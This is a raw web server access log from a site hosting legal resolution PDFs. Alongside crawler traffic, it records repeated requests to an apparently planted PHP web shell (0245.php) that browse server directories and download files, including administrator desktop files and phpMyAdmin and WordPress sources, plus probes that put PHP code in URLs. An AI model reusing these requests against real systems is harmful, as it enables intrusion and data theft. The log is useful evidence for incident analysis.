66.249.66.12 - - [28/Jun/2024:01:32:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3423.pdf HTTP/1.1" 200 1018951
47.128.114.121 - - [28/Jun/2024:01:33:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+971+DE+2006.PDF&ft=download&white=1 HTTP/1.1" 200 21961
201.245.192.253 - - [28/Jun/2024:01:33:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:01:33:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Jun/2024:01:31:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
47.128.119.133 - - [28/Jun/2024:01:33:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=.version&ft=img&white=1 HTTP/1.1" 200 6
66.249.66.13 - - [28/Jun/2024:01:33:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4370.pdf HTTP/1.1" 200 353646
201.245.192.253 - - [28/Jun/2024:01:34:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:01:34:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.36.199 - - [28/Jun/2024:01:34:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+2290+DE+2006.PDF&ft=download&white=1 HTTP/1.1" 200 95840
157.55.39.61 - - [28/Jun/2024:01:34:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/4256.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:01:34:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5065.pdf HTTP/1.1" 200 352138
47.128.36.220 - - [28/Jun/2024:01:34:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=build_html_for_db.lib.php&ft=download&white=1 HTTP/1.1" 200 6113
216.245.221.92 - - [28/Jun/2024:01:34:53 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.166 - - [28/Jun/2024:01:35:00 -0500] "GET /BLA/resoluciones/AUTOS%202022/1556.pdf HTTP/1.1" 200 453331
201.245.192.253 - - [28/Jun/2024:01:35:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.127.170 - - [28/Jun/2024:01:35:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=kanji-encoding.lib.php&ft=download&white=1 HTTP/1.1" 200 4494
201.245.192.253 - - [28/Jun/2024:01:35:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [28/Jun/2024:01:35:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1762.pdf HTTP/1.1" 200 365131
47.128.119.137 - - [28/Jun/2024:01:35:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=select_lang.lib.php&ft=download HTTP/1.1" 200 18548
201.245.192.253 - - [28/Jun/2024:01:36:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [28/Jun/2024:01:36:06 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
47.128.29.255 - - [28/Jun/2024:01:36:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.29.255 - - [28/Jun/2024:01:36:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.29.255 - - [28/Jun/2024:01:36:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.29.255 - - [28/Jun/2024:01:36:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.29.255 - - [28/Jun/2024:01:36:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.29.255 - - [28/Jun/2024:01:36:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.29.255 - - [28/Jun/2024:01:36:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.29.255 - - [28/Jun/2024:01:36:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.29.255 - - [28/Jun/2024:01:36:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CUsers%5CAdministrator%5CDesktop&f=Reports.txt&ft=edit HTTP/1.1" 200 291096
47.128.29.255 - - [28/Jun/2024:01:36:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
54.167.223.174 - - [28/Jun/2024:01:36:35 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.11 - - [28/Jun/2024:01:36:40 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-257-96.docx HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:01:36:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5245.pdf HTTP/1.1" 200 383371
66.249.66.13 - - [28/Jun/2024:01:36:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0135.pdf HTTP/1.1" 200 303208
66.249.66.12 - - [28/Jun/2024:01:36:41 -0500] "GET /BLA/resoluciones/AUTOS%202023/0542.pdf HTTP/1.1" 200 448671
66.249.66.12 - - [28/Jun/2024:01:36:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3264.pdf HTTP/1.1" 200 369416
66.249.66.12 - - [28/Jun/2024:01:36:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3576.pdf HTTP/1.1" 304 -
47.128.29.255 - - [28/Jun/2024:01:36:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.29.255 - - [28/Jun/2024:01:36:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.29.255 - - [28/Jun/2024:01:36:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.29.255 - - [28/Jun/2024:01:36:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.29.255 - - [28/Jun/2024:01:36:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.29.255 - - [28/Jun/2024:01:36:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.29.255 - - [28/Jun/2024:01:36:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.29.255 - - [28/Jun/2024:01:36:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.33.73 - - [28/Jun/2024:01:36:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=class-wp-ajax-response.php&ft=img&white=1 HTTP/1.1" 200 4014
47.128.29.255 - - [28/Jun/2024:01:36:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
201.245.192.253 - - [28/Jun/2024:01:37:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
47.128.29.255 - - [28/Jun/2024:01:36:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CUsers%5CAdministrator%5CDesktop&f=Reports.txt&ft=edit HTTP/1.1" 200 291096
201.245.192.253 - - [28/Jun/2024:01:37:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36712
201.245.192.253 - - [28/Jun/2024:01:37:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35541
201.245.192.253 - - [28/Jun/2024:01:37:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.33.220 - - [28/Jun/2024:01:37:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cautodeclaracion22%5C&f=emisiones.php&ft=img&white=1 HTTP/1.1" 200 648
66.249.66.12 - - [28/Jun/2024:01:37:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2960.pdf HTTP/1.1" 200 488735
201.245.192.253 - - [28/Jun/2024:01:38:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.48.108 - - [28/Jun/2024:01:38:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/%1$s HTTP/1.1" 400 945
172.22.2.4 - - [28/Jun/2024:01:36:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.124.139 - - [28/Jun/2024:01:38:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=class-phpass.php&ft=img&white=1 HTTP/1.1" 200 7114
66.249.66.11 - - [28/Jun/2024:01:38:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0457.pdf HTTP/1.1" 200 486223
201.245.192.253 - - [28/Jun/2024:01:39:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:01:39:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.44.228 - - [28/Jun/2024:01:39:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/%3C?php+echo+strip_tags%28%24_SERVER%5B%27PHP_SELF%27%5D%29.%27%3Fdir=%27.urlencode%28%24dotdotdir%29%3B%3F%3E HTTP/1.1" 403 1006
172.22.2.4 - - [28/Jun/2024:01:37:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51986
201.245.192.253 - - [28/Jun/2024:01:39:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Jun/2024:01:39:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35334
66.249.66.13 - - [28/Jun/2024:01:39:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2242.PDF HTTP/1.1" 200 13643265
47.128.122.107 - - [28/Jun/2024:01:39:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/%27.get_permalink($post-%3EID).%27 HTTP/1.1" 403 1006
66.249.66.13 - - [28/Jun/2024:01:39:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1901.pdf HTTP/1.1" 200 321619
66.249.66.11 - - [28/Jun/2024:01:39:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0467.pdf HTTP/1.1" 200 481754
216.245.221.92 - - [28/Jun/2024:01:39:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:01:40:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:01:40:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35541
47.128.110.134 - - [28/Jun/2024:01:40:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+1993+DE+2006.PDF&ft=img&white=1 HTTP/1.1" 200 9947
66.249.66.12 - - [28/Jun/2024:01:40:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0305.pdf HTTP/1.1" 200 1196128
